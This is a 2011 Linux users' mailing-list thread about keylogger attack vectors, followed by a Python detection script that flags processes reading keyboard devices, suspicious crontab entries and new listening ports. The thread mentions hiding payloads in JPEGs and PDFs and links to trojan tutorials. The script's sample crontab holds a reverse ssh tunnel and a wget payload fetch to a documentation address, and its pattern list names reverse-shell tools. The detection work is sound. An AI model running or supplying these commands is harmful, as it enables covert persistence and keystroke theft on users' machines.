Mike: More, to make the post complete with all available attack vectors that could be deployed to install a keylogger on Linux (Mac and Windows):
On Thu, Jun 30, 2011 at 2:09 PM, mike enriquez <myli...@cox.net> wrote:
> On 06/30/2011 06:55 AM, Lisa Kachold wrote:
> > Hi Mike!
> >
> > On Wed, Jun 29, 2011 at 5:09 PM, mike enriquez <myli...@cox.net> wrote:
> >> Does anyone on the List know if key loggers are a problem in Linux?
> >> I don't know a thing about them. My Windows computers get the things all
> >> the time.
> >> Do I need to worry about them in Linux?
> >> Thanks for any comments.
> >
> > Unlike Windows, where the attack vector is mainly viruses from file
> > transfers, in Linux (and Mac) the attack vector is going to be browser
> > based.
> >
> > So if you don't limit JavaScript trust, you can fall victim to any manner
> > of installations, ssh, or infestations from browser-based attacks like
> > BeEF <http://linux.softpedia.com/get/Internet/HTTP-WWW-/BeEF-29854.shtml>.
> > This tool will provide a triangulated Host --> Website --> YourBrowser
> > attack, similar to XSS browser attacks, that opens your entire
> > Linux (or Mac) system to full control via the browser (Opera/Firefox/etc.).
> > A keylogger like the one referenced by Sam would trivially be installed
> > without your immediate knowledge.
> >
> > Of course if you do not properly firewall your home network, have a "cable
> > modem" that is subject to hacked firmware, or take your laptop to public
> > venues without a proper analysis of open ports or iptables, you can always
> > pick up a "hitcher", who could install a keylogger or other hack.
> >
> > Various hardware hacks also exist, similar to tiny USB devices that can be
> > set up on your keyboard or monitor between connections, which are commonly
> > used by IT managers in NOCs and Operations Centers (where oblivious
> > Operations and Systems staff continue to surf Facebook rather than actually
> > work).
> >
> > Regularly reading the logs, setting up reporting devices that inform you of
> > new files or packages, and of course watching packet traffic by port on a
> > regular basis will assist you in identifying keyloggers, as well as BeEF and
> > XSS browser hacks, since you will clearly see a great deal of nefarious
> > traffic.
> >
> > Of course if you allow 3rd-party cookies and don't control JavaScript, you
> > are just inviting a large number of "adware" and other installations that
> > create traffic. Be sure you use NoScript or another JavaScript trust
> > control plugin at the browser level.
> >
> > It is recommended that ANY systems user always have a fairly realistic
> > understanding of network trust, packet ports and "regular traffic".
> >
> > Also, beyond KEYLOGGERS, everyone needs to know that EVERY SINGLE SITE YOU
> > GOOGLE, every place you visit, can trivially be cross-referenced from other
> > sites to which you authenticate, to provide AT-A-GLANCE NSA and DHS data
> > that will give a complete profile. This includes CHAT LOGS, warez sites,
> > TORRENT, and porn sites.
> > The false sense of security that you can use an anonymizer or browser proxy
> > site, while it will allow you to get to Facebook from work, will not protect
> > you from large-scale data taps at the level of Akamai caching and
> > cable/telecom providers, which can be configured to hit any number of
> > parameters in which the feds are interested.
> >
> > > Also, if you download FULL email messages, including PDF attachments
> > > (which you open without updating your Adobe browser plugin or other
> > > applications for all known exploits) and JPEGs (executable files which I
> > > can trivially [bind to an .exe file for Win7 PowerShell fun] or include
> > > Unicode UTF or BOM characters that can and will set up cron jobs (to open
> > > a reverse ssh session to my hacked server at a certain time of night, for
> > > instance) or wget a keylogger [since this is the subject we are
> > > discussing here in this PLUG post] when "opened"), you are opening new
> > > attack vectors for Linux (or even ones specifically addressed to you by an
> > > associate) [an excellent reason to obfuscate your "real identity" at 2600
> > > Club meetings....].
> > >
> > > References:
> > > http://xahlee.org/comp/unicode_BOM_byte_orde_mark.html
> > > http://www.hackingethics.com/blog/2008/07/22/how-to-convert-exe-files-to-jpg/
> > > http://justhackitnow.blogspot.com/2011/02/hide-multiple-files-into-single-jpg.html
> > > http://www.dirtyservices.com/2010/how-to-create-adobe-acrobat-pdf-exploit-trojan/
> >
> >> Mike Enriquez
> >> ---------------------------------------------------
> >> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
> >> To subscribe, unsubscribe, or to change your mail settings:
> >> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> >
> > --
> > (602) 791-8002 Android
> > (623) 239-3392 Skype
> > (623) 688-3392 Google Voice
> > HomeSmartInternational.com <http://www.homesmartinternational.com>
>
> Thank you Lisa,
> I love this group.
> Every time I ask a question I get an education.
> Take care.
> Mike
--------------------------------------------------- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
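The advice in the thread (watch for new files and packages, watch which ports are listening, and be wary of cron jobs that fetch a keylogger or open a reverse ssh tunnel at night) can be turned into a repeatable host check. The script below is an added example written for this page, not code from the thread or from any of the tools it mentions. It looks for processes that hold /dev/input/event* open (a userland keylogger reads the evdev nodes directly), scans crontab lines for the fetch-and-tunnel patterns the post describes, and diffs `ss -ltnup` output against a baseline snapshot. The pattern list, the crontab and `ss` samples (using the documentation address 203.0.113.7), and the fake /proc tree with pid 4242 are all constructed for the example; `proc_root` is a parameter so the same function runs on the real /proc or the fake one.

```python
"""Host checks for userland keylogger indicators on Linux. Added example, not
code from the PLUG thread: processes holding /dev/input/event* open, crontab
lines that fetch payloads or open reverse tunnels, and listening ports that
appeared since a baseline snapshot. proc_root is a parameter so the first check
can run against a constructed fake /proc tree offline."""
import os
import re
import tempfile
from pathlib import Path

# Crontab indicators. This list is an assumption for the example, not exhaustive.
SUSPICIOUS_CRON = [
    re.compile(r"\bssh\b.*\s-R\s"),             # reverse ssh tunnel
    re.compile(r"\b(wget|curl)\b.*https?://"),   # payload fetched from the network
    re.compile(r"\bnc\b.*\s-e\s"),               # netcat with exec
    re.compile(r"/dev/tcp/"),                    # bash reverse shell
]

def input_device_readers(proc_root="/proc"):
    """Return {pid: [device paths]} for processes holding /dev/input/* open.
    Other users' fd tables need root to read; unreadable pids are skipped."""
    readers = {}
    for entry in Path(proc_root).iterdir():
        if not entry.name.isdigit():          # /proc/self, /proc/sys, ...
            continue
        try:
            fds = list((entry / "fd").iterdir())
        except (PermissionError, FileNotFoundError):
            continue                          # not our process, or it exited
        devices = []
        for fd in fds:
            try:
                target = os.readlink(fd)
            except OSError:
                continue                      # fd closed under us
            if target.startswith("/dev/input/"):
                devices.append(target)
        if devices:
            readers[int(entry.name)] = sorted(devices)
    return readers

def suspicious_cron_lines(lines):
    """Return (line, pattern) pairs for crontab lines worth a second look."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        for pat in SUSPICIOUS_CRON:
            if pat.search(line):
                hits.append((line, pat.pattern))
                break
    return hits

def parse_ss(text):
    """Set of (proto, port) from `ss -ltnup` style output; the header is skipped."""
    sockets = set()
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 5 and fields[0] in ("tcp", "udp"):
            sockets.add((fields[0], fields[4].rsplit(":", 1)[1]))
    return sockets

# Constructed sample data (203.0.113.0/24 is a documentation address range).
CONSTRUCTED_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/updatedb
17 2 * * * ssh -N -R 2222:localhost:22 user@203.0.113.7
*/30 * * * * wget -q -O /tmp/.kl http://203.0.113.7/kl && chmod +x /tmp/.kl
"""
BASELINE_SS = """\
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
tcp   LISTEN 0      128    0.0.0.0:22         0.0.0.0:*
udp   UNCONN 0      0      0.0.0.0:68         0.0.0.0:*
"""
CURRENT_SS = BASELINE_SS + "tcp   LISTEN 0      5      127.0.0.1:4444     0.0.0.0:*\n"

def build_fake_proc(root=None):
    """Constructed /proc tree: pid 4242 holds two evdev nodes open, pid 1 none."""
    proc = Path(root or tempfile.mkdtemp()) / "proc"
    fake_fds = {"1": ["/dev/null"], "4242": ["/dev/input/event0", "/dev/input/event2"]}
    for pid, targets in fake_fds.items():
        (proc / pid / "fd").mkdir(parents=True)
        for n, target in enumerate(targets):
            os.symlink(target, proc / pid / "fd" / str(n))   # dangling link is fine
    (proc / "self").mkdir()                   # non-numeric entry, must be skipped
    return str(proc)

def run_checks(proc_root="/proc"):
    """Run the three checks; cron and port data come from the constructed samples."""
    return {
        "input_readers": input_device_readers(proc_root),
        "cron_hits": suspicious_cron_lines(CONSTRUCTED_CRONTAB.splitlines()),
        "new_listeners": sorted(parse_ss(CURRENT_SS) - parse_ss(BASELINE_SS)),
    }

if __name__ == "__main__":
    live = Path("/proc").is_dir()             # fall back to the fake tree elsewhere
    for name, result in run_checks("/proc" if live else build_fake_proc()).items():
        print(f"{name}: {result}")
```

Run it as root on a real box to see every process's fd table; as an ordinary user it only reports your own processes, which is itself a caveat worth remembering when a keylogger runs as another account. Feed it a real `ss -ltnup` capture taken on a known-clean day as the baseline, and treat any new listener (here the constructed 127.0.0.1:4444) or any crontab hit as something to explain before dismissing.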